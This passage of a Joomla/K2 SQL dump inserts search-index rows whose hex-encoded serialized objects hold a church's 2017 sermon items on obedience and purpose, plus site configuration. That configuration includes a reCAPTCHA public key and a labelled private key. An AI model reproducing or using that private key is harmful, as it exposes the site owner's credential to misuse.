b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223233223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a3130303a2235313a676f642d69732d636f6d6d69747465642d746f2d66696e616e63696e672d616e642d66756e64696e672d796f75722d7072696d6172792d707572706f73652d66726f6d2d6f75722d6661746865722d732d68656172742d31312d30362d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a3131383a22636f6d706f6e656e742f6b322f6974656d2f35312d676f642d69732d636f6d6d69747465642d746f2d66696e616e63696e672d616e642d66756e64696e672d796f75722d7072696d6172792d707572706f73652d66726f6d2d6f75722d6661746865722d732d68656172742d31312d30362d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3531223b733a353a22726f757465223b733a3133373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35313a676f642d69732d636f6d6d69747465642d746f2d66696e616e63696e672d616e642d66756e64696e672d796f75722d7072696d6172792d707572706f73652d66726f6d2d6f75722d6661746865722d732d68656172742d31312d30362d32303137223b733a353a227469746c65223b733a3130313a22476f6420697320436f6d6d697474656420746f2046696e616e63696e6720616e642046756e64696e6720796f7572205072696d61727920507572706f7365202d2046726f6d206f7572204661746865722773204865617274202831312f30362f3230313729223b733a31313a226465736372697074696f6e223b733a3430343a2220474f4420495320434f4d4d6c5454454420544f2046494e414e43494e4720414e442046554e44494e4720594f5552205052494d41525920505552504f53452e204a6572656d696168206c3a5320224265666f7265204920666f726d6564207468656520696e207468652062656c6c792049206b6e657720746865653b20616e64206265666f72652074686f752063616d65737420666f727468206f7574206f662074686520776f6d6220492073616e6374696669656420746865652c20616e642049206f726461696e6564207468656520612070726f7068657420756e746f20746865206e6174696f6e732e202220496e2074686973206b696e67646f6d2c20746865726520617265207072696d61727920707572706f7365732061732077656c6c206173207365636f6e6461727920707572706f7365732e2054686520636f6d6d69746d656e74206f6620476f6420696e20746865206c696665206f662061206d616e20697320616c7761797320746f776172647320746865207072696d61727920707572706f7365206f6620476f642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30362d31312031323a31363a3034223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30362d31312031323a31363a3034223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(275, 'index.php?option=com_k2&view=item&id=52', 'index.php?option=com_k2&view=item&id=52:if-you-are-willing-and-obedient-you-shall-eat-the-good-of-the-land-from-our-father-s-heart-18-06-2017', 'If you are willing and obedient, you shall eat the good of the land - From our Father\'s Heart (18/06/2017)', ' The Bible says if you are willing and obedient, you shall eat the good of the land. The root of problems between God and His people is divine instructions. Instruction is what keeps us within divine structure where our protection and prosperity is secured. Whenever you receive an instruction from the Lord, always commit yourself to obey. Delayed obedience usually becomes outright and eventual disobedience to God. ', '2017-06-25 14:19:45', '764de0e4cac64c0824fcba7e13d79b32', 1, 1, 1, '*', '2017-06-18 12:22:00', '0000-00-00 00:00:00', '2017-06-18 12:22:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223532223b733a353a22616c696173223b733a3130313a2269662d796f752d6172652d77696c6c696e672d616e642d6f62656469656e742d796f752d7368616c6c2d6561742d7468652d676f6f642d6f662d7468652d6c616e642d66726f6d2d6f75722d6661746865722d732d68656172742d31382d30362d32303137223b733a373a2273756d6d617279223b733a3434373a223c703e546865204269626c65207361797320696620796f75206172652077696c6c696e6720616e64206f62656469656e742c20796f75207368616c6c206561742074686520676f6f64206f6620746865206c616e642ec2a03c2f703e0d0a3c703e54686520726f6f74206f662070726f626c656d73206265747765656e20476f6420616e64204869732070656f706c6520697320646976696e6520696e737472756374696f6e732e20496e737472756374696f6e2069732077686174206b656570732075732077697468696e20646976696e6520737472756374757265207768657265206f75722070726f74656374696f6e20616e642070726f7370657269747920697320736563757265642ec2a03c2f703e0d0a3c703e5768656e6576657220796f75207265636569766520616e20696e737472756374696f6e2066726f6d20746865204c6f72642c20616c7761797320636f6d6d697420796f757273656c6620746f206f6265792e2044656c61796564206f62656469656e636520757375616c6c79206265636f6d6573206f7574726967687420616e64206576656e7475616c206469736f62656469656e636520c2a0746f20476f642e3c2f703e0d0a223b733a343a22626f6479223b733a313837313a220d0a3c703ec2a04469736f62656469656e636520746f20646976696e6520696e737472756374696f6e20776173207768617420636175736564204164616d20616e642045766520746f206c6f736520746865697220706c61636520696e207468652067617264656e206f66204564656e2e204576657279207472616765647920616e642070726f626c656d20696e206d6f73742070656f706c652773206c6976657320746f646179206973206e6f74206a7573742074686520646576696c206275742069742063616d65206173206120726573756c74206f66206f6e6520696e737472756374696f6e206f7220746865206f74686572207468617420776173206469736f62657965642c2069676e6f7265642c206e65676c6563746564206f72206d6973756e64657273746f6f642ec2a03c2f703e0d0a3c703e54686520677265617465737420626c657373696e67732066726f6d20476f6420636f6d6573207768656e20796f75206f62657920646976696e6520696e737472756374696f6e2e20596f75722070726f766973696f6e20666f72206c69666520616e642064657374696e792061726520696e2074686520706c616365206f6620796f7572206f62656469656e63652e20466f72206578616d706c652c20696620492068616420666f6c6c6f776564206d79206f776e2064657369726520616e64206e6f74206f626579656420476f64207768656e2048652073656e74206d6520746f20496c657361206f6e2066756c6c2074696d6520746f206561726e204e20313020706572207765656b2c20776520776f756c64206e6f7420626520646f696e6720746865206d696e697374727920617420746865206c6576656c2077652061726520746f6461792e2049206f626579656420476f642c20616e642077652061726520616c6c207769746e657373657320746f2048697320666169746866756c6e65737320746f64617920696e206d79206c69666520616e6420696e20746865206d696e69737472792e20416e6420617320776520636f6e74696e75652c207765207368616c6c206d6565742077697468206d6f7265206f662048697320666169746866756c6e6573732ec2a03c2f703e0d0a3c703e476f6420616c776179732072657761726473206f62656469656e636520746f2048697320696e737472756374696f6e2e20496620796f7520737475647920746865204269626c6520766572792077656c6c2c2065766572796f6e6520746861742063726f73736564207468652070617468206f6620476f6420776974686f757420726564656d7074696f6e2063726f73736564206974207468726f756768206469736f62656469656e636520746f20646976696e6520696e737472756374696f6e732e20476f6420746f6f6b20746865206b696e67646f6d2066726f6d205361756c2062656361757365206f6620746861742e205468617420776173207768617420636f737420456c6920686973206c69666520616e64206869732074776f20736f6e732e20426f7468206f66207468656d2064696564206f6e207468652073616d65206461792e20596f75206d75737420756e6465727374616e64207468617420646976696e6520696e737472756374696f6e7320617265206e6f7420746f2062652074616b656e206c696768746c792ec2a03c2f703e0d0a3c703e446976696e6520696e737472756374696f6e732063616e20636f6d6520746f20796f75207468726f75676820706572736f6e616c207374756479206f662074686520776f7264206f6620476f642c20696e207370656369616c206d656574696e67732c206f72207468726f75676820486973206f726461696e65642073657276616e747320746f20796f752e2054616b65206865656420746f207468656d207768656e207468657920636f6d6520616e64206c6574207468656d20666f726d2074686520646972656374696f6e206f6620796f7572206c6966652e20446f6e277420626520612043687269737469616e2074686174206765747320636172726965642061776179207769746820746865206d6f766573206f6620476f642c20616e6420666f72676574732074686520696e737472756374696f6e73207468617420666f6c6c6f7720746865726561667465722e20416c7761797320777269746520646f776e20796f757220696e737472756374696f6e732c20616e6420676f206f766572207468656d206f76657220616e64206f76657220756e74696c20796f752068617665206f626579656420616c6c20776974686f7574206c656176696e6720616e796f6e6520626568696e642ec2a03c2f703e0d0a3c703e594f555220505245534552564154494f4e20495320494e204f42454449454e434520544f20444956494e4520494e535452554354494f4e532ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732ec2a03c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e5265762e204f6c75736f6c614172656f67756e2ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30362d32352031333a31313a3137223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c41